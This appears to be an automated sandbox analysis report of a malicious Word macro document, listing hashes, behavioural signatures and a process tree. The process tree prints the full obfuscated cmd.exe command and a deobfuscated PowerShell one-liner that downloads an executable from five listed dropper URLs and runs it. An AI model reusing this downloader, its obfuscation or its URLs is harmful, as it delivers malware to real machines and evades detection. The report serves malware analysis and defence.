Analysis

  • max time kernel
    101s
  • max time network
    126s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/05/2024, 11:05

General

  • Target

    3445861e718e3414725e2ee1af1b7d40_JaffaCakes118.doc

  • Size

    68KB

  • MD5

    3445861e718e3414725e2ee1af1b7d40

  • SHA1

    db660619f5abdb23490c2b60288ea93c8df4a3ad

  • SHA256

    97c417918368f2b12dd4f531d6038f0f9b30c6a902fd17d43f6873f679cf1b11

  • SHA512

    4d04836bb21d36b6afd02667119d9eb6da3c4a4c84db3a1138894a96a966412933685b38449caddfc459dfe194f6a9f2aea8162f1d2982d91b000ad5b46c942f

  • SSDEEP

    768:upJcaUitGAlmrJpmxlzC+w99NBE+1o/BbbMmBktlFAO2vxwpp:uptJlmrJpmxlRw99NBE+a/NknF

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://mooremakeup.com/k

exe.dropper

http://crossroadstamp.com/0

exe.dropper

http://ntsuporte.com.br/kl5

exe.dropper

http://oooka.biz/RaQOFhRM

exe.dropper

http://parusalon.ru/idb

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\3445861e718e3414725e2ee1af1b7d40_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3276
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /V^:^O/C"^s^e^t ^jU^8n=^ ^ ^ ^ ^ ^ ^ ^ ^ }^}{^hc^t^ac^};^ka^erb^;FvK$^ ^m^e^t^I-^e^k^ovnI^;)^Fv^K$^ ,Jl^I$(eli^Fda^o^lnwo^D.^S^zv^${yr^t{)z^Bi$ n^i^ ^Jl^I$(hc^aer^o^f;^'^ex^e.'^+Q^Q^i$+^'^\'+c^i^lbu^p:vn^e^$^=Fv^K$^;'^68^7^' = ^QQ^i$;)'@'(tilp^S^.'^bd^i/^ur.n^ola^s^ura^p//^:^ptt^h@MRh^FO^QaR/^zi^b^.^a^ko^oo//:^ptt^h@5^l^k/rb.^m^oc.e^tro^p^u^stn//:p^tth^@0/m^oc^.^pma^t^sd^aors^sorc//^:^ptt^h@^k/^m^oc^.pue^kam^er^o^om//:ptth'^=zB^i^$^;tnei^lCbe^W^.t^eN^ ^tc^ejbo^-w^en=S^zv^$ ^l^l^e^h^sre^wop&&^f^or /^L %^x ^in (^3^40,^-^1^,^0)^d^o s^e^t ^8^h=!^8^h!!^jU^8n:~%^x,1!&&^i^f %^x ^eq^u ^0 ca^l^l %^8^h:^~^4%"
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:2480
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $vzS=new-object Net.WebClient;$iBz='http://mooremakeup.com/k@http://crossroadstamp.com/0@http://ntsuporte.com.br/kl5@http://oooka.biz/RaQOFhRM@http://parusalon.ru/idb'.Split('@');$iQQ = '786';$KvF=$env:public+'\'+$iQQ+'.exe';foreach($IlJ in $iBz){try{$vzS.DownloadFile($IlJ, $KvF);Invoke-Item $KvF;break;}catch{}}
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4156

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\TCD9427.tmp\iso690.xsl

          Filesize

          263KB

          MD5

          ff0e07eff1333cdf9fc2523d323dd654

          SHA1

          77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

          SHA256

          3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

          SHA512

          b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i3nax1ki.pga.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/3276-16-0x00007FFED5570000-0x00007FFED5580000-memory.dmp

          Filesize

          64KB

        • memory/3276-29-0x00007FFF17810000-0x00007FFF17A05000-memory.dmp

          Filesize

          2.0MB

        • memory/3276-7-0x00007FFED7890000-0x00007FFED78A0000-memory.dmp

          Filesize

          64KB

        • memory/3276-6-0x00007FFED7890000-0x00007FFED78A0000-memory.dmp

          Filesize

          64KB

        • memory/3276-4-0x00007FFED7890000-0x00007FFED78A0000-memory.dmp

          Filesize

          64KB

        • memory/3276-3-0x00007FFED7890000-0x00007FFED78A0000-memory.dmp

          Filesize

          64KB

        • memory/3276-8-0x00007FFF17810000-0x00007FFF17A05000-memory.dmp

          Filesize

          2.0MB

        • memory/3276-10-0x00007FFF17810000-0x00007FFF17A05000-memory.dmp

          Filesize

          2.0MB

        • memory/3276-28-0x00007FFF17810000-0x00007FFF17A05000-memory.dmp

          Filesize

          2.0MB

        • memory/3276-13-0x00007FFF17810000-0x00007FFF17A05000-memory.dmp

          Filesize

          2.0MB

        • memory/3276-12-0x00007FFF17810000-0x00007FFF17A05000-memory.dmp

          Filesize

          2.0MB

        • memory/3276-11-0x00007FFF17810000-0x00007FFF17A05000-memory.dmp

          Filesize

          2.0MB

        • memory/3276-9-0x00007FFF17810000-0x00007FFF17A05000-memory.dmp

          Filesize

          2.0MB

        • memory/3276-15-0x00007FFED5570000-0x00007FFED5580000-memory.dmp

          Filesize

          64KB

        • memory/3276-5-0x00007FFF17810000-0x00007FFF17A05000-memory.dmp

          Filesize

          2.0MB

        • memory/3276-0-0x00007FFED7890000-0x00007FFED78A0000-memory.dmp

          Filesize

          64KB

        • memory/3276-14-0x00007FFF17810000-0x00007FFF17A05000-memory.dmp

          Filesize

          2.0MB

        • memory/3276-26-0x00007FFF17810000-0x00007FFF17A05000-memory.dmp

          Filesize

          2.0MB

        • memory/3276-551-0x00007FFF17810000-0x00007FFF17A05000-memory.dmp

          Filesize

          2.0MB

        • memory/3276-1-0x00007FFF178AD000-0x00007FFF178AE000-memory.dmp

          Filesize

          4KB

        • memory/3276-45-0x00007FFF17810000-0x00007FFF17A05000-memory.dmp

          Filesize

          2.0MB

        • memory/3276-2-0x00007FFF17810000-0x00007FFF17A05000-memory.dmp

          Filesize

          2.0MB

        • memory/3276-454-0x00007FFF178AD000-0x00007FFF178AE000-memory.dmp

          Filesize

          4KB

        • memory/3276-455-0x00007FFF17810000-0x00007FFF17A05000-memory.dmp

          Filesize

          2.0MB

        • memory/3276-525-0x00007FFF17810000-0x00007FFF17A05000-memory.dmp

          Filesize

          2.0MB

        • memory/3276-526-0x00007FFF17810000-0x00007FFF17A05000-memory.dmp

          Filesize

          2.0MB

        • memory/3276-527-0x00007FFF17810000-0x00007FFF17A05000-memory.dmp

          Filesize

          2.0MB

        • memory/3276-547-0x00007FFED7890000-0x00007FFED78A0000-memory.dmp

          Filesize

          64KB

        • memory/3276-548-0x00007FFED7890000-0x00007FFED78A0000-memory.dmp

          Filesize

          64KB

        • memory/3276-550-0x00007FFED7890000-0x00007FFED78A0000-memory.dmp

          Filesize

          64KB

        • memory/3276-549-0x00007FFED7890000-0x00007FFED78A0000-memory.dmp

          Filesize

          64KB

        • memory/4156-33-0x000001C8C86A0000-0x000001C8C86C2000-memory.dmp

          Filesize

          136KB